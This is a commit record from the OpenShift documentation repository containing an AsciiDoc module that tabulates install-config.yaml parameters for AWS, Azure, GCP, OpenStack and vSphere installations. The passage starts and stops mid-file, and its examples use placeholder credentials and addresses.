parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String.\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String.\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String.\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String.\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String.\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String.\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer.\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer.\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual CPUs (vCPUs) on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`\n|Integer.\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer.\n|====\n\nendif::vsphere[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d69d03b976530fde291e2d9703d03a6d7f24edf3","subject":"RHDEVDOCS-2966 tracker for Bug 1956414 - [DOC] Remove mention of multiple ssh-keys from user doc as it is currently not officially supported","message":"RHDEVDOCS-2966 tracker for Bug 1956414 - [DOC] Remove mention of multiple ssh-keys from user doc as it is currently not officially supported\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-configuration-parameters.adoc","new_file":"modules\/installation-configuration-parameters.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:vsphere:\nendif::[]\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n[IMPORTANT]\n====\nThe `openshift-install` command does not validate field names for parameters. If an incorrect name is specified, the related file or object is not created, and no error is reported. Ensure that the field names for any parameters that are specified are correct.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heteregeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\nifndef::openshift-origin[]\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n[NOTE]\n====\nIf you are using Azure File storage, you cannot enable FIPS mode.\n====\n|`false` or `true`\nendif::openshift-origin[]\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the network for the cluster.\n|Object\n\n[NOTE]\n====\nYou cannot modify parameters specified by the `networking` object after installation.\n====\n\n|`networking.networkType`\n|The default Container Network Interface (CNI) network provider plug-in to install.\nifdef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OVNKubernetes`.\nendif::openshift-origin[]\nifndef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OpenShiftSDN`.\nendif::openshift-origin[]\n|String\n\n|`networking.clusterNetwork`\n|The IP address blocks for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`. If you specify multiple IP address blocks, the blocks must not overlap.\n|Array of objects. For example:\n\n[source,yaml]\n----\nnetworking:\n clusterNetwork:\n - cidr: 10.128.0.0\/14\n hostPrefix: 23\n----\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. An IP address block.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.128.0.0\/14`.\n\n|`networking.clusterNetwork.hostPrefix`\n|The subnet prefix length to assign to each individual node. For example, if `hostPrefix` is set to `23`, then each node is assigned a `\/23` subnet out of the given `cidr`, allowing for 510 (2^(32 - 23) - 2) pod IP addresses.\n|A subnet prefix. The default value is `23`.\n\n|`networking.serviceNetwork`\n|The IP address block for services. The default is `172.30.0.0\/16`.\n\nThe OpenShift SDN and OVN-Kubernetes Container Network Interface (CNI) network providers support only a single IP address block for the service network.\n|An IP address block in CIDR format. For example, `172.30.0.0\/16`.\n\n[source,yaml]\n----\nnetworking:\n serviceNetwork:\n - 172.30.0.0\/16\n----\n\n|`networking.machineNetwork`\n|The IP address blocks for machines.\n|Array of objects\n\n[source,yaml]\n----\nnetworking:\n machineNetwork:\n - cidr: 10.0.0.0\/16\n----\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. An IP address block. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.0.0.0\/16`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key to authenticate access to your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|For example, `sshKey: ssh-ed25519 AAAA..`.\n\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the compute machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the control plane machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.hostedZone`\n|An existing Route 53 private hosted zone for the cluster. You can only use a pre-existing hosted zone when also supplying your own VPC. The hosted zone must already be associated with the user-provided VPC before installation. Also, the domain of the hosted zone must be the cluster domain or a parent of the cluster domain. If undefined, the installation program creates a new hosted zone.\n|String, for example `Z3URY6TWQ91KVV`.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n\nThis property is deprecated. To use a flavor as the default for all machine pools, add it as the value of the `type` key in the `platform.openstack.defaultMachinePlatform` property. You can also set a flavor value for each machine pool individually.\n\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.apiFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`controlPlane.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB. The minimum supported disk size is `1024`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.resourceGroupName`\n| The name of an already existing resource group to install your cluster to. This resource group must be empty and only used for this specific cluster; the cluster components assume ownership of all resources in the resource group. If you limit the service principal scope of the installation program to this resource group, you must ensure all other resources used by the installation program in your environment have the necessary permissions, such as the public DNS zone and virtual network. Destroying the cluster using the installation program deletes this resource group.\n|String, for example `existing_resource_group`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to 